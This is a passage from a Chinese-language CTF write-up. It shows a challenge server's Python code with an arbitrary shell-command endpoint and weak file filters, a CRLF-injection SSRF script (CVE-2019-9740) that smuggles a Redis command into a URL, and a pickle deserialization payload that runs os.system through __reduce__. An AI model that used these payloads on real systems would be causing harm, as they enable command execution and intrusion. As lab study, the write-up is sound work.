if len(lines) > 1:
parts = lines[1].split()
if len(parts) >= 6:
disk_info = {
'filesystem': parts[0],
'size': parts[1],
'used': parts[2],
'available': parts[3],
'use_percent': parts[4],
'mounted': parts[5]
}
except:
disk_info = {'error': 'Unable to get disk info'}

return {
'system': platform.system(),
'node': platform.node(),
'release': platform.release(),
'version': platform.version(),
'machine': platform.machine(),
'processor': platform.processor(),
'load_average': loadavg,
'memory': mem_info,
'disk': disk_info,
'uptime': self._get_uptime(),
'time': time.strftime('%Y-%m-%d %H:%M:%S')
}
except Exception as e:
return {'error': str(e)}

def _get_uptime(self):
"""获取系统运行时间"""
try:
with open('/proc/uptime', 'r') as f:
uptime_seconds = float(f.readline().split()[0])
days = int(uptime_seconds // 86400)
hours = int((uptime_seconds % 86400) // 3600)
minutes = int((uptime_seconds % 3600) // 60)
return f"{days}d {hours}h {minutes}m"
except:
return "Unknown"

def list_files(self, path='.'):
"""列出指定目录下的文件和目录"""
try:
if '..' in path or path.startswith('/'):
sensitive_dirs = ['/etc', '/root', '/home', '/var']
for sensitive in sensitive_dirs:
if path.startswith(sensitive) and not path.startswith('/opt/mcp_service'):
return {'error': 'Access to sensitive directory restricted'}

files = []
for item in os.listdir(path):
item_path = os.path.join(path, item)
stat = os.stat(item_path)
files.append({
'name': item,
'path': item_path,
'is_dir': os.path.isdir(item_path),
'size': stat.st_size,
'modified': time.ctime(stat.st_mtime),
'permissions': oct(stat.st_mode)[-3:]
})
return {'path': path, 'files': files}
except Exception as e:
return {'error': str(e)}

def read_file(self, filepath):
"""读取文件内容"""
try:
if '..' in filepath or filepath.startswith('/etc/passwd') or 'flag' in filepath:
return {'error': 'Access to sensitive file restricted'}

with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read(5000) # 限制读取大小
return {
'file': filepath,
'content': content,
'truncated': len(content) == 5000
}
except Exception as e:
return {'error': str(e)}

def execute_command(self, command):
"""执行系统命令"""
try:
logger.warning(f"执行命令: {command}")

result = subprocess.run(
command,
shell=True,
capture_output=True,
text=True,
timeout=10
)

return {
'command': command,
'returncode': result.returncode,
'stdout': result.stdout,
'stderr': result.stderr,
'success': result.returncode == 0
}
except subprocess.TimeoutExpired:
return {'error': 'Command execution timeout'}
except Exception as e:
return {'error': str(e)}

def get_process_list(self):
"""获取进程列表"""
try:
processes = []
# 使用ps命令获取进程信息
ps_output = subprocess.check_output(
['ps', 'aux'],
stderr=subprocess.DEVNULL,
text=True
)

lines = ps_output.strip().split('\n')
if len(lines) > 1:
header = lines[0]
for line in lines[1:21]: # 限制返回前20个进程
parts = line.split()
if len(parts) >= 11:
process = {
'user': parts[0],
'pid': parts[1],
'cpu': parts[2],
'mem': parts[3],
'vsz': parts[4],
'rss': parts[5],
'tty': parts[6],
'stat': parts[7],
'start': parts[8],
'time': parts[9],
'command': ' '.join(parts[10:])
}
processes.append(process)

return {'process_count': len(processes), 'processes': processes}
except Exception as e:
return {'error': str(e)}

def service_control(self, service_name, action):
"""控制系统服务(start/stop/restart/status)"""
try:
if action not in ['start', 'stop', 'restart', 'status']:
return {'error': 'Invalid action. Use start/stop/restart/status'}

result = subprocess.run(
['systemctl', action, service_name],
capture_output=True,
text=True,
timeout=10
)

return {
'service': service_name,
'action': action,
'returncode': result.returncode,
'stdout': result.stdout,
'stderr': result.stderr
}
except FileNotFoundError:
return {'error': 'systemctl not available'}
except Exception as e:
return {'error': str(e)}

def run(self):
"""运行MCP服务器"""
logger.info(f"启动安全MCP服务器,监听 {self.host}:{self.port}")
logger.info("所有方法需要认证令牌")
try:
self.server.serve_forever()
except KeyboardInterrupt:
logger.info("收到中断信号,关闭服务器")
finally:
self.server.server_close()
logger.info("MCP服务器已关闭")

def main():
"""主函数"""
# 检查运行权限
if os.geteuid() != 0:
logger.warning("警告:服务未以管理员权限运行,部分功能可能受限")
logger.warning("建议以管理员权限运行以获得完整功能")

# 创建并运行服务器
server = MCPServerSecure(host='0.0.0.0', port=54321)
server.run()

if __name__ == '__main__':
main()

SSRF

搜索发现这个版本的urllib存在CRLF,CVE-2019-9740,贴个GitHub Issue链接

贴上原文:Attack Scenarios

  1. By crafting HTTP headers, it’s possible to fool some web services;
  2. It’s also possible to attack several simple services like Redis, memcached.

Let’s take Redis as a example here:

Adapt the script above to this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python3
import sys
import urllib
import urllib.error
import urllib.request

host = "10.251.0.83:6379?\r\nSET test success\r\n"
url = "http://" + host + ":8080/test/?test=a"
try:
info = urllib.request.urlopen(url).info()
print(info)
except urllib.error.URLError as e:
print(e)
#end

We changed the injected header to a valid redis command, after executing this, we check the redis server:

1
2
3
127.0.0.1:6379> GET test
"success"
127.0.0.1:6379>

We can see that a “test” key was inserted successfully.

嗯就是这个原理,但是折腾仔细这些个\r\n真的真的非常折磨。

Pickle

急了急了,没时间了当然急了。题目有限制,所以需要从OnlineUser出发,真的很基础,但当时已经静不下去思考了()

1
OnlineUser.__init__.__globals__["os"].system("ls")

赛后复现就很简单。接着去请求MCP就好了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import os, pickle,datetime
from flask import request
class OnlineUser:
"""在线用户类,用于保存登录状态信息"""
def __init__(self, username, role="user"):
self.username = username
self.role = role
self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# 设置失效时间为登录时间后1小时
expiry = datetime.datetime.now() + datetime.timedelta(hours=1)
self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S")
self.ip_address = request.remote_addr if request else "unknown"

def __repr__(self):
return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"

def __reduce__(self):
return (OnlineUser.__init__.__globals__["os"].system, ("say 你妈",))


if __name__ == "__main__":
payload = pickle.dumps(OnlineUser("aaa"), protocol=0)
print(payload)
# b'cposix\nsystem\np0\n(Vsay \\u4f60\\u5988\np1\ntp2\nRp3\n.'
pickle.loads(payload)

后纪

傻逼平台,时间一到就关靶机,坚持到最后一分钟早就不是为了flag而做了(因为大概也出不了了)。结果一刷新说是靶机没了?非常糟糕的体验,浪费了很多时间,花费的时间和学到的知识没成正比。